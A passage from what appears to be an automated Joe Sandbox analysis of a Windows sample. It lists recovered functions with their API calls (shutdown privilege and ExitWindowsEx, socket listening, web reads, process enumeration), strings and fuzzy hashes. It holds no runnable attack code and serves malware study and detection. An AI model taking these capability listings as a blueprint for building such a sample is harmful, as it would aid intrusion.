FindClose.KERNEL32(00000000), ref: 00F63C0A

Strings

\*.*, xrefs: 00F63B5B

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 4e5dc830e327fb248b9800623e5b75d6a3c403397d6286eb117c4fa9182ef512
Instruction ID: 3700299efb3ab7174b1e12d9fbe9e60f1067c73c1dba38bc7e1e8074948e6718
Opcode Fuzzy Hash: 4e5dc830e327fb248b9800623e5b75d6a3c403397d6286eb117c4fa9182ef512
Instruction Fuzzy Hash: D0317A31408384AFC601EF24DC918AFB7E8AE91314F404A2DF4D6921D1EB25EA0DFB62

Function 00F651BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00F587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F5882B
Part of subcall function 00F587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F58858
Part of subcall function 00F587E1: GetLastError.KERNEL32 ref: 00F58865

ExitWindowsEx.USER32(?,00000000), ref: 00F651F9

Strings

@, xrefs: 00F651EC
, xrefs: 00F651E7
SeShutdownPrivilege, xrefs: 00F651C9

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: ac6416cda9e7eef65291b328d25542eed93292e18cd94ab69d0033dbe5985eba
Instruction ID: a4df0f5a28a70df1d858023571b50793e2c16cb2283930febeb3a395cefdf079
Opcode Fuzzy Hash: ac6416cda9e7eef65291b328d25542eed93292e18cd94ab69d0033dbe5985eba
Instruction Fuzzy Hash: 69012B32BA16156FF7286278ACAAFFB7358DB05B51F240461FD03F60D2DA515C05B690

Function 00F76283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00F762DC
WSAGetLastError.WSOCK32(00000000), ref: 00F762EB
bind.WSOCK32(00000000,?,00000010), ref: 00F76307
listen.WSOCK32(00000000,00000005), ref: 00F76316
WSAGetLastError.WSOCK32(00000000), ref: 00F76330
closesocket.WSOCK32(00000000,00000000), ref: 00F76344

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 3b7d4e1589e4b1c2445267f7eef8befacc750ae547b9101f42da166008a21d62
Instruction ID: 6bb18dc230e831a9e2b26a0579aef85189d0e99c32fcb41ec97640eabc1365ac
Opcode Fuzzy Hash: 3b7d4e1589e4b1c2445267f7eef8befacc750ae547b9101f42da166008a21d62
Instruction Fuzzy Hash: 4A21EE716006049FCB00EF64CC45B7EB7A9EF48320F548159E81AE73D2C770AD04EB52

Function 00F15520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON

Download Yara Rule

APIs

Part of subcall function 00F20DB6: std::exception::exception.LIBCMT ref: 00F20DEC
Part of subcall function 00F20DB6: __CxxThrowException@8.LIBCMT ref: 00F20E01

_memmove.LIBCMT ref: 00F50258
_memmove.LIBCMT ref: 00F5036D
_memmove.LIBCMT ref: 00F50414

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID:
API String ID: 1300846289-0
Opcode ID: 6eff9fa77c2cfc9ec38a90b1b7d3e5486c69347d6109f3e5f17a5c035f6788fa
Instruction ID: e28f4423dd1528c626bcadbb426d7ab8d12b2049239baee6776190b3753ccafe
Opcode Fuzzy Hash: 6eff9fa77c2cfc9ec38a90b1b7d3e5486c69347d6109f3e5f17a5c035f6788fa
Instruction Fuzzy Hash: 7802F171E00609DFCF04DF64D981AAEBBB5EF84300F1480A9E906DB295EF35D954EB91

Function 00F01287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 00F02612: GetWindowLongW.USER32(?,000000EB), ref: 00F02623

DefDlgProcW.USER32(?,?,?,?,?), ref: 00F019FA
GetSysColor.USER32(0000000F), ref: 00F01A4E
SetBkColor.GDI32(?,00000000), ref: 00F01A61

Part of subcall function 00F01290: DefDlgProcW.USER32(?,00000020,?), ref: 00F012D8

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: 742f10f15c255130d050414e02900951c90bbd6872dfe241361a15677fa4aea0
Instruction ID: f9e5e71d4f49a7e0a9691d5cb561643e87b504a9ac0496f67934eb7ce3f66c3a
Opcode Fuzzy Hash: 742f10f15c255130d050414e02900951c90bbd6872dfe241361a15677fa4aea0
Instruction Fuzzy Hash: 90A14772606549BEEB29AB688C69FBF355CFF41361F14011AF602D61D2CB2C9D41B3B1

Function 00F6BCBC Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00F6BCE6
_wcscmp.LIBCMT ref: 00F6BD16
_wcscmp.LIBCMT ref: 00F6BD2B
FindNextFileW.KERNEL32(00000000,?), ref: 00F6BD3C
FindClose.KERNEL32(00000000,00000001,00000000), ref: 00F6BD6C

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
Opcode ID: 5cf60d5991112b1119d95142ecb7a1af84af14a02ee6e3a5cdcb575c8802fcb5
Instruction ID: d20f95a39f803a12953515abde9e6af414f19752c2c733161b2cab30f9b6870e
Opcode Fuzzy Hash: 5cf60d5991112b1119d95142ecb7a1af84af14a02ee6e3a5cdcb575c8802fcb5
Instruction Fuzzy Hash: 08519D75A046029FC714DF28C890EAAB3E8EF49324F14465DE956CB3A1DB34ED44EB91

Function 00F76747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00F77D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00F77DB6

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00F7679E
WSAGetLastError.WSOCK32(00000000), ref: 00F767C7
bind.WSOCK32(00000000,?,00000010), ref: 00F76800
WSAGetLastError.WSOCK32(00000000), ref: 00F7680D
closesocket.WSOCK32(00000000,00000000), ref: 00F76821

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: c0ceab8ab3abea1801c9ef19374747478357b5f55c3bfaafa8383a7d05d62c97
Instruction ID: 91e89e186cb2f55b821462f817f29f7dd7981047a6a4c244aa57bd3999ca35f3
Opcode Fuzzy Hash: c0ceab8ab3abea1801c9ef19374747478357b5f55c3bfaafa8383a7d05d62c97
Instruction Fuzzy Hash: 0D41E071A00600AFDB10AF248C82F7E77E89B44764F44815CFA59AB3C3DAB89D01B792

Function 00F85376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00F853C5
IsWindowEnabled.USER32 ref: 00F853D3
GetForegroundWindow.USER32(?,?,00000001), ref: 00F853E0
IsIconic.USER32 ref: 00F853EE
IsZoomed.USER32 ref: 00F853FC

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 6cf3b48acae06f100da27b5291ee5172861946a783d6915665572afc20622567
Instruction ID: 86b651f8a1a39a4d6d9b35c8bc43160b6faa94d6038de12136dd4c5f71d08c70
Opcode Fuzzy Hash: 6cf3b48acae06f100da27b5291ee5172861946a783d6915665572afc20622567
Instruction Fuzzy Hash: 0111C431700915AFEB217F26DC44AAE7B9AEF44BA1B444438F845D7281DBB4DC01A7A0

Function 00F580A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00F580C0
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00F580CA
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00F580D9
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00F580E0
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00F580F6

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 30dde5682290ada0360a26c03aea7d5b55359a556f80d5c5919a261f52bd22b3
Instruction ID: 0e9dfabbf626a9cfc5e302fb12db4f3aa7be980ab355ad8261f31bdbeb392410
Opcode Fuzzy Hash: 30dde5682290ada0360a26c03aea7d5b55359a556f80d5c5919a261f52bd22b3
Instruction Fuzzy Hash: 51F04F31240708EFEB104FA5EC8DEB73FACEF497A5B100025FA45D6150DA619C4AFB60

Function 00F04B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00F04AD0), ref: 00F04B45
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00F04B57

Strings

GetNativeSystemInfo, xrefs: 00F04B51
kernel32.dll, xrefs: 00F04B40

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 4e55ca520eca2970d4a950b541fb6725b21062c6bfc8ee9eb4ae7fac89a0a3f4
Instruction ID: b3d7b385b44a05d51eab722dd8ca97c2cff1b52810f8f62b1dbcc9072dfe1294
Opcode Fuzzy Hash: 4e55ca520eca2970d4a950b541fb6725b21062c6bfc8ee9eb4ae7fac89a0a3f4
Instruction Fuzzy Hash: EBD0C2B0E00717CFC720AF31D81CB8272D4AF80360B10883A9481C2190D674E484E714

Function 00F13030 Relevance: 6.6, APIs: 4, Instructions: 587COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: __itow__swprintf
String ID:
API String ID: 674341424-0
Opcode ID: c81484f6f9d62506dfb6790dc64b2f3169d941987c984118dae12f21d05ce106
Instruction ID: 6165f6ec8a0d6453b99aa53d43f1a4e1d0e5e87243a95d14acdfecf2079c4694
Opcode Fuzzy Hash: c81484f6f9d62506dfb6790dc64b2f3169d941987c984118dae12f21d05ce106
Instruction Fuzzy Hash: 7522BE72A083009FC724DF14C881BAFB7E4AF85710F50491DF99A97292EB75E944EB93

Function 00F7EE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00F7EE3D
Process32FirstW.KERNEL32(00000000,?), ref: 00F7EE4B

Part of subcall function 00F07DE1: _memmove.LIBCMT ref: 00F07E22

Process32NextW.KERNEL32(00000000,?), ref: 00F7EF0B
CloseHandle.KERNEL32(00000000,?,?,?), ref: 00F7EF1A

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: 9418a03db43760c1054fc0a0bb7f5842b839296e2bcbe14825899ee8b5450716
Instruction ID: 19c6d803fc5d59c31f46d38ef637aec80b567bad0b84ee1ce129141b3fd38478
Opcode Fuzzy Hash: 9418a03db43760c1054fc0a0bb7f5842b839296e2bcbe14825899ee8b5450716
Instruction Fuzzy Hash: 1251A3715087059FD310EF20CC85EABB7E8EF98710F50492DF595972A1EB74E908EB92

Function 00F0FCE0 Relevance: 5.5, APIs: 3, Instructions: 1040COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: BuffCharUpper
String ID:
API String ID: 3964851224-0
Opcode ID: b879d2a5618f3d2781458ace23fba07a8376faf0f5251ee2874609a2b9c487bb
Instruction ID: 5c89c37123ff578012826ceed00c115c6b31051ebfc9cf920f1d065e48371876
Opcode Fuzzy Hash: b879d2a5618f3d2781458ace23fba07a8376faf0f5251ee2874609a2b9c487bb
Instruction Fuzzy Hash: 10927E71908341DFD720DF14C480B6ABBE1BF89314F14892DE8999B352DBB5EC85EB92

Function 00F5E616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 00F5E628

Strings

(, xrefs: 00F5E66E
|, xrefs: 00F5E658

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: ecd09fb8173879a66c515cc8847d6a54dd44cbc4db072eee640ee43c8159925f
Instruction ID: 90695e76c9021414f3be0e5834e20ac4a1427b56b04070bc6f8b3539324fbd09
Opcode Fuzzy Hash: ecd09fb8173879a66c515cc8847d6a54dd44cbc4db072eee640ee43c8159925f
Instruction Fuzzy Hash: 0F323775A007059FD728CF29D481A6AB7F0FF48320B15C56EE99ADB3A2D770E941CB40

Function 00F722EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00F7180A,00000000), ref: 00F723E1
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00F72418

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 0ba3eb3592188d09ffc7e29eb2434014549c02256372fb13bfa468cf84220777
Instruction ID: c0b11c2acfda79fcb1771f3be179f5827d0d01668f22b1966b71dc9ed3e1824f
Opcode Fuzzy Hash: 0ba3eb3592188d09ffc7e29eb2434014549c02256372fb13bfa468cf84220777
Instruction Fuzzy Hash: 4141E572904209BFEBA0DE95DC81FBF77BCEB40724F10806BF649A6141DA749E41B652

Function 00F6B3FB Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00F6B40B
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00F6B465
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00F6B4B2

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 04535602ea7789ce491688da2970f52f0b46a137e50a2cf850a9b6178f0004d4
Instruction ID: 4a8ed0bcaa2ce8251a821c9f849c2f04cc73fadaa22127351e7fa0beaa5695b7
Opcode Fuzzy Hash: 04535602ea7789ce491688da2970f52f0b46a137e50a2cf850a9b6178f0004d4
Instruction Fuzzy Hash: 8E219275A00108DFCB00EF95DC84AEDBBB8FF49310F1480A9E905EB352DB319955EB50

Function 00F587E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00F20DB6: std::exception::exception.LIBCMT ref: 00F20DEC
Part of subcall function 00F20DB6: __CxxThrowException@8.LIBCMT ref: 00F20E01

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F5882B
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F58858
GetLastError.KERNEL32 ref: 00F58865

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 7c30463a58fe8c57601c811222674ce5eac69cea8e65166442a6a1f52d66a258
Instruction ID: d471157c6ee8f7a41c9957bdad7f2b1541bb83cf60dfcc84c34bff0a7fe67f29
Opcode Fuzzy Hash: 7c30463a58fe8c57601c811222674ce5eac69cea8e65166442a6a1f52d66a258
Instruction Fuzzy Hash: DC11BFB2804204AFE718DFA4EC85D7BB7F8EB04311B20852EF85593211EF30BC459B60

Function 00F5874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00F58774
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00F5878B
FreeSid.ADVAPI32(?), ref: 00F5879B

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 5553f51f3e62d390dc890a1f8bbcf0f69b8084db9fcca30d3890a1fee236928c
Instruction ID: 18cb63db73c38189e9e05ae46b60c1ab0313041932560ea0b1c6291af173d5c6
